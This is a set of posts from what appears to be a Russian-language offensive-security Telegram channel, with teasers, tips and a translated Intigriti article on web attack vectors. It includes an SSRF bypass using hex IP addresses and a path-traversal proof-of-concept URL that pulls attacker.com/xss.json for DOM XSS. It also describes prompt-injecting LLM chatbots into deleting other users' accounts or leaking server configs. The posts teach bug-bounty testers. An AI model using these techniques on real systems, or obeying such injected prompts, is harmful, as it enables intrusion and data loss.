Удобная подача списка url в shortscan по очереди
#shortscan #IIS #microsoft #заметка

cat IIS.txt | xargs -I@ sh -c 'shortscan @'

P.S. в целом любую тулзу можно так завернуть, если разработчик не сделал функционал указания файла, как входных данных, а можно и PR ему отправить 😉

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

первая тысяча людей в чате)

Заходите, если не знали о чате ранее. Всегда активные беседы)

🌚 @poxek_chat

Nuclei Fu
#nuclei #projectdiscovery #DAST

В сегодняшней статье речь пойдет о Nuclei — это мощный open-source инструмент для поиска уязвимостей (DAST), который активно развивается благодаря поддержке сообщества.
Доклад «Nuclei Fu» был впервые представлен экспертами СайберОК – Станиславом Савченко и Андреем Сикорским – на самой масштабной в Центральной Азии хакерской конференции KazHackStan, проходившей 11-13 сентября.

Посмотреть доклад: здесь
Посмотреть презентацию к докладу: здесь

За последний год в Nuclei было несколько крупных обновлений, которые принесли множество фич, таких как кодовая вставка, использование javascript в шаблонах, управление запросами через flow, внедрение подписи шаблонов и пр. Сегодня хотелось бы рассказать о возможных атаках на Nuclei, а именно о клиентских атаках, которые стали доступны благодаря этим нововведениям.

Далее рассказ буду вести в контексте двух сторон – Алисы, которая хочет защитить свой веб-сервер от сканирования Nuclei, и Боба, который, собственно, и запускает Nuclei.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Ключ от всех дверей: как нашли бэкдор в самых надежных* картах доступа
#nfc #rfid #СКУД

Вы прикладываете ключ-карту к считывателю, и дверь офиса открывается. Но что, если такой пропуск может взломать и скопировать любой желающий?

В 2020 году Shanghai Fudan Microelectronics выпустила новые смарт-карты FM11RF08S. Производитель заявил об их полной защищенности от всех известных методов взлома. Группа исследователей проверила эти заявления и обнаружила встроенный бэкдор, позволяющий получить полный доступ к данным карты.

P.S. ребята старались писать статью, обязательно ставьте +rep

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

🐞 Методология баг-баунти: гайд для охотников за багами
#bugbounty #дляначинающих #meme

Эта статья основана на моем опыте веб-хакера, но описанные в ней принципы в целом применимы ко всем дисциплинам хакинга. В основном она предназначена для начинающих хакеров и для людей, которые уже нашли несколько багов, но хотят сделать свой подход к баг-баунти более последовательным и систематичным.

Об авторе: я Киаран (или Monke). Я ирландец, но живу в Эдинбурге. Занимаюсь баг-баунти уже примерно четыре года, участвовал в четырех мероприятиях Live Hacking Event на разных платформах, скоро будет пятое. Я довольно типичный веб-хакер, сейчас мне больше всего нравится заниматься хакингом на стороне клиента. В этом году я наконец полностью перешел на зарабатывание денег при помощи баг-баунти и основал компанию Simian Security. Возможно, я единственный ирландец, для которого баг-баунти является полноценной работой.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

IaC и DevSecOps: выбираем лучшие инструменты анализа и защиты инфраструктурного кода
#IaC #DevSecOps #appsec #безопаснаяразработка

Сегодня мы вновь будем говорить об особенностях статического сканирования, но на этот раз переключим фокус с программного кода на код инфраструктурный.

Частично этот вопрос обсуждался в статье про безопасность контейнеризированных приложений в DevSecOps. В этой статье будут рассмотрены краткие теоретические сведения о подходе “Инфрастуркутра как кодˮ, место безопасности IaC в цикле DevSecOps, методы статического анализа конфигурационных файлов и ключевые особенности работы с инструментом KICS.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

💻 Как мы докатились до Kubernetes и чем он заслужил любовь бизнеса
#k8s #kubernetes #контейнеры #container

Kubernetes сейчас массово используют в ЦОДах и облачных решениях. Какие заслуги у Кубера, что было до него и почему сейчас он едва ли не стандарт отрасли. А ещё, как понять, что Кубер вам ни к чему.

Сначала пятиминутка истории: как мы жили до появления Kubernetes. Когда-то серверные инфраструктуры основывались на концепции Bare Metal — физическом оборудовании, на котором выполнялись приложения. Такая архитектура позволяла чётко контролировать вычислительные ресурсы: количество ядер CPU, объём оперативной памяти и другие параметры можно было определять и наращивать напрямую, делая аппаратные апгрейды. Закон Мура работал на руку: рост производительности позволял постоянно повышать мощность без значительных затрат. При необходимости можно было создать настоящий кластер, объединяя серверы для эффективного распределения нагрузки и улучшенной работы с пользовательскими запросами.

➡️ Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

🌚 Давно не заходила на канале речь про мерч
#merch #мерч #скидки #промокод

Собственно есть 2 новости, хорошая и очень хорошая)

1. Начнем с очень хорошей!)
Сегодня что-то много говорят про скидки какие-то, какое-то 11.11 и хоть с опозданием решил запрыгнуть в этот скидочный вагон и сделать вам подгон 😏
Как вы могли догадаться, я подготовил для вас ПРОМОКОД на скидку в 10% на весь мерч в магазине
➡️ Промокод: merchpoxeksale
➡️ Воспользоваться: https://shop.poxek.cc

🔺 Промокод активен только до конца недели (16.11)

2. Сейчас в разработке новые единицы мерча. Будут использоваться новые футболки, которые я пока ещё тестирую.
Спойлер: один или несколько из дизайнов будет в японской стилистике
А пока оставляйте свои догадки, пожалания, запросы на какой-то мерч в комментариях с #merchrequest. Тогда я точно не пропущу ваш комментарий)

Да прибудет с вами RCE 🔓

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Практические варианты использования port knocking
#харденинг #ssh #ACL #fail2ban #администрирование

Существуют различные варианты попыток защиты\сокрытия сервисов от "любопытных глаз". Основные: использование нестандартного порта, fail2ban, ACL и tarpit (и их сочетание).
Есть ещё port knocking: как дополнительный фактор защиты - может снизить обнаружение сервиса, а не пытаться бороться с последствиями (брутфорс, эксплуатация), когда сервис уже обнаружен. Но, очень часто эта технология оказывается не используемой. Где-то из-за незнания технологии (хотя, статей хватает). Но, чаще из-за проблем на практике, которые мешают её внедрению:

➡️Читать тута

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

От мышей на экране до zip-бомбы: топ приложений-шуток из начала нулевых
#дляолдов #meme

Сразу комментарий от меня: очень веселая статья, которые не оставит ни одного олда флешбеков)

Пришла пора признаться: я скучаю по интернету начала нулевых. © Антон Комаров "МТС Диджитал"

Тогда он был действительно забавным местом, где каждый мог найти себе развлечение по вкусу. Было круто посмеяться над очередным flash-выпуском приключений «подруги космических туристов», пообщаться с друзьями в IRC или ICQ или скачать какой-нибудь «ускоритель интернета», оказывающийся в итоге банальным вирусом.

Подшутить над неопытными пользователями считалось вполне в порядке вещей, поэтому существовал целый пласт программ, которые эту задачу отлично выполняли. Пранки иногда носили массовый характер, особенно в компьютерных классах школ и техникумов. Сегодня предлагаю вспомнить, чем же можно было довести преподавателя и системного администратора до белого каления.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

🔺 Новый SSRF Bypass или как удивить коллегу под вечер
#dns #ssrf #bypass #hex

[ Оказалось способ древний, но я его увидел впервые :) ]

Все мы используем IPv4 ежедневно. Все мы используем IPv6 ежедневно. Но прямо сейчас меня удивил один парень из чата, открыв глаза, что браузер оказывается резолвит даже IP в Hex и Octal формате.

Hex IP — это представление IP-адреса в шестнадцатеричной системе. Обычно IP-адрес записывается в привычном формате с точками, например 192.168.0.1, где каждая часть — это десятичное значение байта (от 0 до 255). Однако этот же адрес можно представить в шестнадцатеричной системе.

Принцип работы:
IP-адрес состоит из 4 байтов, и каждый байт можно представить в шестнадцатеричном формате (от 00 до FF):

Десятичный IP 192.168.0.1 представлен в виде четырех байт: 192 (0xC0), 168 (0xA8), 0 (0x00), 1 (0x01).
Hex представление будет C0A801001.

Как преобразовать IP-адрес в шестнадцатеричный формат:

Возьмите каждый октет IP-адреса и переведите его в шестнадцатеричную систему.
Объедините эти значения в строку без точек.

Если вы введете URL вида http://0xC0A80001, браузер или сервер может интерпретировать это как запрос на http://192.168.0.1.

Для удобной конвертации можете использовать следующую команду:

printf '%02X' 192 168 0 1 ; echo

Получете следующий вывод: C0A80001, подставляем 0x - hex код

➡️Переходим http://0xC0A80001 и вау, оно срабатывает 😧

Собственно коллега по работе (это про тебя Андрей)), что это можно использовать при тестировании SSRF. Дальше сами фантазируйте)
Удивите и своих коллег, поделившись постом 🌝

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Ладно, реально старый метод. Откупаюсь старым мемом
#meme

🌚 @poxek

Top 4 new attack vectors in web application targets (часть 1)
#перевод #web #LLM #дляначинающих

👉 Это вольный перевод статьи от Intigriti

1️⃣ LLM Prompt Injection — это относительно новый тип уязвимости. Сейчас многие компании интегрируют LLM модели (например, чат-боты) в свои продукты, чтобы повысить продуктивность клиентов. Есть и компании, полностью построенные на базе ИИ, где это ядро их продукта или услуг.

С новыми фишками на базе ИИ появляются и новые точки для атак. Одна из таких – инъекция запросов в LLM, которая может привести к куче проблем с безопасностью, от утечки данных до выполнения нежелательных действий.

LLM модели работают так, что они парсят пользовательские запросы и выполняют действия на их основе. Если модель настроена слабо или плохо реализованы ограничения доступа, злонамеренные юзеры могут заставить модель делать то, что им нужно.

Например, запрос типа «удалить учетную запись пользователя», связанный с вызовом API или запросом к базе данных, который удалит указанную учетку. Если атакующий сможет уговорить модель добавить нужный email (или другой идентификатор), он сможет удалить учетные записи других пользователей.

Другой пример – заставить модель читать конфиги сервера и вернуть их содержимое. Или специально выводить вредоносный контент, чтобы вызвать XSS-атаку.

Если вы работаете с виртуальным помощником, чат-ботом или чем-то подобным, что принимает естественный язык, обязательно проверьте его доступный скоуп и попытайтесь уговорить выполнять действия.

2️⃣ Prototype Polution — это уязвимость в JavaScript, где злоумышленник манипулирует цепочкой прототипов объекта, чтобы внедрять или изменять свойства, которые затрагивают другие объекты приложения. Обычно такая проблема возникает из-за небезопасного слияния или клонирования объектов с данными, которые может контролировать пользователь.

Эта уязвимость часто проходит незамеченной из-за своей сложности и обычно требует цепочки или инструмента, чтобы ее реально можно было эксплуатировать. Плюс, чтобы развить атаку и доказать ее эффективность, нужен высокий уровень понимания JavaScript.

Prototype Pollution может привести к DOM-based XSS, если уязвимость найдена на стороне клиента. Уязвимости на серверной стороне труднее обнаружить и эксплуатировать, но они могут привести к RCE!

Для практики проходите лабы на PortSwigger.

➡️Вторая часть поста

➡️Оригинальная статья

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

Top 4 new attack vectors in web application targets (часть 2)
#перевод #web #дляначинающих

👉 Это вольный перевод статьи от Intigriti

3️⃣ Client-side path traversal - это не новая категория уязвимостей, но их популярность растет, так как все больше компаний используют JavaScript-фреймворки.

Корень этих проблем – неотфильтрованный произвольный пользовательский ввод, который попадает в путь HTTP-запроса на стороне клиента. Эти уязвимости похожи на обход путей на сервере, но воздействуют только на клиента.

Большинство таких уязвимостей сами по себе не критичны и обычно требуют цепочки с другой уязвимостью (например, инъекция CRLF, открытый URL редирект, инъекция контента и т.д.), чтобы эскалироваться до CSRF или XSS.

const id = (new URLSearchParams(location.search)).get("id");
if (id) {
  let item = null;

  // Точка API возвращает данные запрашиваемого элемента
  fetch("/api/items/" + id, {
    method: "GET"
  })
  .then(async (res) => {
    item = await res.json();
    parseItem(item);
  })
  .catch((error) => {
    item = null;
    console.error("ОШИБКА! Не удалось получить элемент!", error);
  });
};

function parseItem(item) {
  // Динамическая обработка и парсинг элемента
  document.getElementById("title").innerHTML = item.title;
  document.getElementById("url").href = item.url;
};

Этот фрагмент кода проверяет наличие параметра id в запросе и внедряет его в путь функции fetch без какой-либо проверки.

Мы, как атакующие, можем попытаться превратить этот простой обход пути в DOM-based XSS, загрузив наш собственный вредоносный JSON-файл. У нас есть несколько вариантов, как это сделать:
➡️Использовать открытый редирект URL
➡️Использовать существующий эндпоинт с инъекцией контента
➡️Или загрузить наш собственный JSON-файл (если цель поддерживает загрузку файлов и документов)

Вот как будет выглядеть PoC, использующий уязвимость с редиректом на открытый URL:

https://app.example.com/items/view?id=../../auth/signin?redirect_to=https%3A%2F%2Fattacker.com%2Fxss.json

Это позволит подтянуть наш вредоносный файл с нашего сервера, и мы сможем заполнить поля title и url (в файле xss.json) для достижения DOM-based XSS!

4️⃣ Dependency confusion — это уязвимости, нацеленные на цепочку поставок софта, позволяющие атакующим внедрить вредоносный код в проект, что часто приводит к удаленному выполнению кода.

Происходит это из-за конфликтов в названиях пакетов и неправильно настроенных сборочных скриптов, из-за чего сборка подтягивает вредоносный (опубликованный атакующим) пакет вместо доверенного внутреннего или локального.

Большинство охотников за багами не ищут Dependency confusion, т.к. эксплуатация больше сведена к удаче.

Intigrity рекомендует прочитать статью Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies.

➡️Первая часть поста

➡️Оригинальная статья

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

🌚 По приколу в пятничный вечер организовали в чате Кавычки квизы на тему работы с LD_PRELOAD
Если интересно проверить свои знания, то пожалуйста)

Советую прочитать советы после прохождения всех квизов)
Cправка о популярных методах защиты с использование LD_PRELOAD
➡️Запрет использования LD_PRELOAD для SUID-программ
➡️Использование инструментов контроля доступа, таких как SELinux и AppArmor
➡️Использование статической компоновки
➡️Ограничение прав доступа к динамическим библиотекам
➡️Использование механизма ptrace для отслеживания процессов
➡️ASLR (Address Space Layout Randomization
➡️Использование проверки целостности бинарных файлов и библиотек
➡️Использование утилиты Seccomp
➡️Ну и запихнуть в контейнер выкрутив ограничения никогда не было лишним

Всем хороших выходных и не болейте! ❤️

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

From forgetful to forgetful (Part 2)
#forgetful2forgetful #sqlmap

🔺 cmd.poxek.cc 🔺

Когда-то я написал пост, который назвал from forgetful to forgetful. Смысл его был в том, что я постоянно забывал, как быстро установить и накатить свои настройки oh-my-zsh и тогда родился тот пост.

Этот же пост порождён был моим учеником с менторства, который постоянно забывает как корректно составлять команду перед её запуском. Поэтому данный проект по сути является интерактивным сайтов для генерации команды. На данный я сделал это только для sqlmap, далее планирую сделать для nmap. Инструменты выбираю по принципу, где много аргументов и где люди по моему опыту чаще всего факапят.

Сайт очень простой, его код будет доступен всегда на 📱 Github. Сайт написан на NextJS и всё. Только клиентская часть, без какого либо логгирования того, что вы вводите. Так что пользуйтесь с кайфом. Если будут предложения по коду, кидайте 📱 PR, обсудим.

кто-то скажет "о новый таргет" - я скажу "удачи")

Надеюсь проект будет полезен. Хороших выходных!

➡️ Ссылка на сайт: cmd.poxek.cc

📱 Github

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча